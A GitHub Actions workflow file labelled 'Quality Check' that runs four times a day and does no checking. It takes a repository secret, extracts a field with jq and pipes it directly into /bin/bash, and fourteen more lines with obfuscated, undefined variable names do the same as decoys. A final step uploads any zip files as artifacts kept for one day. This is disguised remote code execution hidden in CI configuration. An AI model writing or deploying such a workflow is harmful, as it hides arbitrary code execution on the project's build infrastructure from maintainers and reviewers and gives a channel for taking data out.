name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '5 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          oln33: ${{ secrets.oln33 }}
        run: |
          printf '%s' "$oln33" | jq -r .pl181 | /bin/bash
          printf '%s' "$h94344" | jq -r .crd72694 | /bin/bash
          echo $skhz932 | jq -r .runis80385 | /bin/bash
          echo $crm8 | jq -r .ug3533 | /bin/bash
          printf '%s' "$vf65" | jq -r .b1 | /bin/bash
          echo $udups3 | jq -r .bv2 | /bin/bash
          echo $t8 | jq -r .gaq547 | /bin/bash
          echo $yhly66320 | jq -r .y761 | /bin/bash
          echo $cs57321 | jq -r .bqex1002 | /bin/bash
          echo $vdgj749 | jq -r .ltapo792 | /bin/bash
          echo $vxea8326 | jq -r .sxmb17762 | /bin/bash
          echo $rk134 | jq -r .anmqe33462 | /bin/bash
          echo $sb154 | jq -r .ftgd93 | /bin/bash
          echo $nkrxs59 | jq -r .krewu221 | /bin/bash
          printf '%s' "$tjtip729" | jq -r .cbz8829 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: ofPDHwLB
          path: "*.zip"
          retention-days: 1
